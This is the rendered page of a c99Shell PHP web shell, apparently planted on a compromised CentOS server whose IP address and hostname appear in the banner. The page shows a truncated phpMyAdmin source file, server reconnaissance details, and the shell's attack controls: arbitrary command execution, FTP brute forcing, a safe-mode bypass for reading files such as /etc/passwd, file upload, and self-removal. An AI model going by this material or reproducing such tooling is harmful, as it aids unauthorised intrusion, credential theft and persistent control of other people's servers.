110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/phpMyAdmin/ drwxrwxrwx Free 52.6 GB of 127.8 GB (41.15%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/ drwxrwxrwx
Free 52.6 GB of 127.8 GB (41.15%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: tbl_properties_export.php (3.84 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

 rebuild query from scracts, this doesn't work with nested
        // selects :-(
        $analyzed_sql = PMA_SQP_analyze($parsed_sql);
        $sql_query = 'SELECT ';

        if (isset($analyzed_sql[0]['queryflags']['distinct'])) {
            $sql_query .= ' DISTINCT ';
        }

        $sql_query .= $analyzed_sql[0]['select_expr_clause'];

        if (!empty($analyzed_sql[0]['from_clause'])) {
            $sql_query .= ' FROM ' . $analyzed_sql[0]['from_clause'];
        }

        if (isset($primary_key) && is_array($primary_key)) {
            $sql_query .= ' WHERE ';
            $conj = '';
            foreach ($primary_key AS $i => $key) {
                $sql_query .= $conj . '( ' . $key . ' ) ';
                $conj = 'OR ';
            }
        } elseif (!empty($analyzed_sql[0]['where_clause']))  {
            $sql_query .= ' WHERE ' . $analyzed_sql[0]['where_clause'];
        }
        if (!empty($analyzed_sql[0]['group_by_clause'])) {
            $sql_query .= ' GROUP BY ' . $analyzed_sql[0]['group_by_clause'];
        }
        if (!empty($analyzed_sql[0]['having_clause'])) {
            $sql_query .= ' HAVING ' . $analyzed_sql[0]['having_clause'];
        }
        if (!empty($analyzed_sql[0]['order_by_clause'])) {
            $sql_query .= ' ORDER BY ' . $analyzed_sql[0]['order_by_clause'];
        }
    } else {
        // Just crop LIMIT clause
        $inside_bracket = FALSE;
        for ($i = $parsed_sql['len'] - 1; $i >= 0; $i--) {
            if ($parsed_sql[$i]['type'] == 'punct_bracket_close_round') {
                $inside_bracket = TRUE;
                continue;
            }
            if ($parsed_sql[$i]['type'] == 'punct_bracket_open_round') {
                $inside_bracket = FALSE;
                continue;
            }
            if (!$inside_bracket && $parsed_sql[$i]['type'] == 'alpha_reservedWord' && strtoupper($parsed_sql[$i]['data']) == 'LIMIT') {
                // We found LIMIT to remove
                
                $sql_query = '';
                
                // Concatenate parts before
                for ($j = 0; $j < $i; $j++) {
                    $sql_query .= $parsed_sql[$j]['data'] . ' ';
                }
                
                // Skip LIMIT
                $i++;
                while ($i < $parsed_sql['len'] &&
                    ($parsed_sql[$i]['type'] != 'alpha_reservedWord' 
bool(false)

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--